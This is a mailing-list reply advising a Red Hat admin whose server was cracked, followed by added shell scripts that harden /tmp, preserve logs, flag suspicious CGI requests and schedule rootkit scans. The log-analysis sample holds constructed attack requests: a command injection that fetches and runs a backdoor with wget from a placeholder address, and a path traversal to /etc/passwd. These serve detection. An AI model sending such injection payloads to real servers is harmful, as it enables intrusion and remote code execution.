help i've been hacked. :(

Eris Caffee eris-redhat-list at eldalin.com
Sat Aug 20 19:04:20 UTC 2005


Chris,

The first thing to do is download and run the chkrootkit and rkhunter
programs.  It sounds like you might have a rootkit installed, and these
programs may be able to identify which one you have.  Honestly, this
information may turn out not to be too useful since you are already
cracked, but you should get these programs anyway and start running them
on a regular basis.  They can at least help you to quickly notice if
something like this ever happens again.

chkrootkit: http://www.chkrootkit.org/
rkhunter: http://www.rootkit.nl/projects/rootkit_hunter.html

As for how you were cracked, don't assume that it was through an unpatched
vulnerability.  I work for a very large ISP and I see cracked servers a
few times a week and many break-ins are done by exploiting improperly
configured security.  For example, check to see if your /tmp directory is
mounted with the noexec and nosuid options.  Just enabling those options
can prevent a lot of cracks since many attacks rely on being able to
exploit a weak cgi script to upload a program into /tmp and run it.

And, of course, cgi scripts are frequently a way for attackers to gain
access to your system.  I would suggest that before you reinstall, you
should save copies of all of your log files, and also save the output of
the "rpm -qa" command to get a list of all the installed software on your
system.  You can use the list to see if you had any versions of packages
with known security holes, and you can use the logs, especially the web
server logs, to see if there were any strange web requests around the time
the crack occurred, such as someone running a cgi-script with lots of
garbage characters on the request line.

Another way attackers can get a foot in the door is by scanning your
system for users who have set their passwords to be the same as their
usernames.  You would not believe how common this is, and once the
attacker has a login to your system - any login - he or she can usually
find some way to gain further access, and maybe even root.  I don't know
if you are doing shared hosting on your server, but if you are you should
make sure that all of your users pick secure (or at least non-trivial)
passwords.

I expect you will want to get the server up and running again ASAP and
won't be spending a lot of time on dissecting the old drive, so just be
sure to keep an eye on the new system, log everything, and scan it
frequently.

Good luck!  Getting cracked like this is no fun at all and can really cost
money if your business depends on it.  Try to use this opportunity to
learn as much as you can about security so you can prevent this from
happening again.

For more info, you might try asking on the message boards at EV1
(http://forum.ev1servers.net) and WebHosting Talk
(http://www.webhostingtalk.com).  The people on these boards are mostly
running webservers on RedHat and they have good advice to offer.
(Disclaimer:  I work for EV1.)

Eris Caffee
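The /tmp advice in the reply above, as an added example that is not part of the original post or of any Red Hat tooling: a small POSIX sh script that checks whether /tmp is mounted with noexec and nosuid and rewrites the fstab line so that it is. The mount table it reads by default is constructed for the example (the device names are made up); run it with --live to check /proc/mounts on a real system.

```shell
#!/bin/sh
# Added example, not from the original post: check whether /tmp is mounted
# noexec,nosuid (the options the post recommends) and rewrite the fstab line
# so that it is. The mount table below is constructed for the example; run
# with --live to check /proc/mounts on the real system instead.

SAMPLE_MOUNTS='/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw 0 0
/dev/sda2 /home ext3 rw,nosuid 0 0'

WANT="noexec nosuid"

# mount_opts MOUNTPOINT < table: print the option field of that mount point
# (fstab and /proc/mounts both keep the options in field 4)
mount_opts() {
  awk -v mp="$1" '$2 == mp { print $4; exit }'
}

# has_opt OPTS OPT: succeed if OPT is in the comma-separated list OPTS
has_opt() {
  case ",$1," in
    *,"$2",*) return 0 ;;
    *)        return 1 ;;
  esac
}

# check_tmp < table: print "ok", or which required options are missing
check_tmp() {
  opts=$(mount_opts /tmp)
  if [ -z "$opts" ]; then
    echo "not a separate mount"   # nothing to enforce until /tmp is its own fs
    return 1
  fi
  missing=""
  for o in $WANT; do
    has_opt "$opts" "$o" || missing="$missing $o"
  done
  if [ -n "$missing" ]; then
    echo "missing:$missing"
    return 1
  fi
  echo ok
}

# harden_fstab < fstab > fstab.new: append the required options to the /tmp
# line if they are not already present; other lines pass through unchanged.
# Apply with: mount -o remount /tmp   (then re-run check_tmp < /proc/mounts)
harden_fstab() {
  awk -v want="$WANT" '
    $2 == "/tmp" {
      n = split(want, w, " ")
      for (i = 1; i <= n; i++)
        if (index("," $4 ",", "," w[i] ",") == 0) $4 = $4 "," w[i]
    }
    { print }'
}

if [ "${1:-}" = "--live" ]; then
  check_tmp < /proc/mounts
else
  printf '%s\n' "$SAMPLE_MOUNTS" | check_tmp || true
  printf '%s\n' "$SAMPLE_MOUNTS" | harden_fstab | check_tmp
fi
```

Two caveats a practitioner should keep in mind: the options only help if /tmp is its own filesystem (check_tmp says so when it is not), and noexec is a speed bump rather than a wall, since a script handed to an interpreter (`sh /tmp/x`) still runs. It removes the easy "upload a binary and run it" path the post describes, nothing more.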

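The "before you reinstall" step from the reply (save the logs and the `rpm -qa` output, then look through the web server log for odd CGI requests), as an added example that is not from the original post. The log lines are constructed for the example; the script names, addresses and payloads in them are made up and do not refer to any real vulnerability.

```shell
#!/bin/sh
# Added example, not from the original post: two helpers for the "before you
# reinstall" step. preserve_evidence copies the logs and package list off the
# box; suspicious_requests pulls out the kind of web log entries the post
# talks about (a CGI script hit with shell metacharacters, traversal, or a
# long run of encoded garbage). The log lines below are constructed for the
# example; the script names and addresses in them are not real.

SAMPLE_LOG='10.0.0.5 - - [18/Aug/2005:03:12:01 +0000] "GET /index.html HTTP/1.1" 200 1234
10.0.0.5 - - [18/Aug/2005:03:12:04 +0000] "GET /cgi-bin/form.cgi?email=a@example.com HTTP/1.1" 200 512
192.0.2.77 - - [18/Aug/2005:03:40:17 +0000] "GET /cgi-bin/stats.cgi?dir=|cd%20/tmp;wget%20192.0.2.1/bd;chmod%20755%20bd;./bd| HTTP/1.0" 200 2048
192.0.2.77 - - [18/Aug/2005:03:40:19 +0000] "GET /cgi-bin/test.cgi?x=%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90%90 HTTP/1.0" 500 0
198.51.100.9 - - [18/Aug/2005:04:01:00 +0000] "GET /cgi-bin/../../../../etc/passwd HTTP/1.0" 404 0'

# preserve_evidence LOGDIR DESTDIR: tar up the logs, save "rpm -qa", and
# checksum the copies so you can show later that they were not altered.
# Point DESTDIR at removable or remote storage, not the disk you will wipe.
preserve_evidence() {
  logdir=$1; dest=$2
  mkdir -p "$dest"
  tar -C "$logdir" -cf "$dest/logs.tar" .
  if command -v rpm >/dev/null 2>&1; then
    rpm -qa | sort > "$dest/rpm-qa.txt"
  fi
  find "$dest" -type f ! -name CKSUMS -exec cksum {} + > "$dest/CKSUMS"
}

# suspicious_requests < access.log: print "ip [reasons] request" for cgi-bin
# requests that carry shell metacharacters (raw or URL-encoded), directory
# traversal, an encoded NUL, or 16 or more URL-encoded bytes (binary payload
# or NOP-sled style garbage on the request line).
suspicious_requests() {
  awk -F'"' '
    {
      req = $2                                  # the quoted request line
      if (req !~ /\/cgi-bin\//) next
      split($1, pre, " "); ip = pre[1]          # client address is field 1
      why = ""
      if (req ~ /[|;`]|%7[cC]|%3[bB]|%60/)                 why = why "shell-meta,"
      if (req ~ /\.\.\// || req ~ /%2[eE]%2[eE]%2[fF]/)     why = why "traversal,"
      if (req ~ /%00/)                                      why = why "nul,"
      if (gsub(/%[0-9a-fA-F][0-9a-fA-F]/, "&", req) >= 16)  why = why "encoded-run,"
      if (why != "") print ip " [" substr(why, 1, length(why) - 1) "] " req
    }'
}

# Demo on the constructed log. On a real box:
#   preserve_evidence /var/log /mnt/usb/evidence
#   suspicious_requests < /var/log/httpd/access_log
printf '%s\n' "$SAMPLE_LOG" | suspicious_requests
```

The flagged addresses are the thread to pull on next: grep the same IPs across all the saved logs (ssh, ftp, mail) and note the timestamps, which is what lets you tell the break-in from the ordinary scanning noise a public web server sees every day.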

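The reply's advice to run chkrootkit and rkhunter "on a regular basis" so that a repeat is noticed quickly, as an added example that is not part of the original post or of either scanner's own distribution: a cron wrapper that keeps each report and prints only the findings that were not in the previous one. The STATE directory, the TRUSTED_BIN variable and the /etc/cron.daily placement are assumptions for the example.

```shell
#!/bin/sh
# Added example, not from the original post: a cron wrapper that runs
# chkrootkit and rkhunter (whichever are installed), keeps the report, and
# prints only findings that were not in the previous report, so a new
# warning is not lost in the usual noise. STATE, TRUSTED_BIN and the
# /etc/cron.daily placement are assumptions for the example.

STATE=${STATE:-/var/lib/rootkit-scan}

# run_scanners OUTFILE: warnings from both scanners, written to OUTFILE.
# Succeeds (with an empty file) when neither scanner is installed.
run_scanners() {
  : > "$1"
  if command -v chkrootkit >/dev/null 2>&1; then
    # -q prints only findings; -p makes chkrootkit use ls/ps/netstat from a
    # trusted directory (e.g. a mounted CD) instead of the system binaries,
    # which a rootkit may already have replaced
    if [ -n "${TRUSTED_BIN:-}" ]; then
      chkrootkit -q -p "$TRUSTED_BIN" >> "$1" 2>&1 || true
    else
      chkrootkit -q >> "$1" 2>&1 || true
    fi
  fi
  if command -v rkhunter >/dev/null 2>&1; then
    # --sk: no keypress between test groups; --rwo: report warnings only
    rkhunter --check --sk --rwo --nocolors >> "$1" 2>&1 || true
  fi
}

# new_findings OLD NEW: lines of NEW that do not appear in OLD
new_findings() {
  if [ -s "$1" ]; then
    grep -vxF -f "$1" "$2" || true      # grep exits 1 when nothing is new
  else
    cat "$2"                            # no previous report: everything is new
  fi
}

# daily: scan, show what changed since the last run, rotate the report.
# Installed as /etc/cron.daily/rootkit-scan, cron mails the output to root,
# so a quiet day produces no mail and a new warning produces one.
daily() {
  mkdir -p "$STATE"
  run_scanners "$STATE/today.txt"
  if [ -f "$STATE/last.txt" ]; then
    new_findings "$STATE/last.txt" "$STATE/today.txt"
  else
    cat "$STATE/today.txt"
  fi
  mv "$STATE/today.txt" "$STATE/last.txt"
}

if [ "${1:-}" = "--daily" ]; then
  daily
fi
```

The same limitation the reply mentions applies here: both scanners run on the live system with its own kernel and, unless pointed at trusted binaries, its own tools, so a clean report after a break-in proves little. Their value is the baseline they give you on the freshly reinstalled box, which is why the wrapper reports changes rather than the full output.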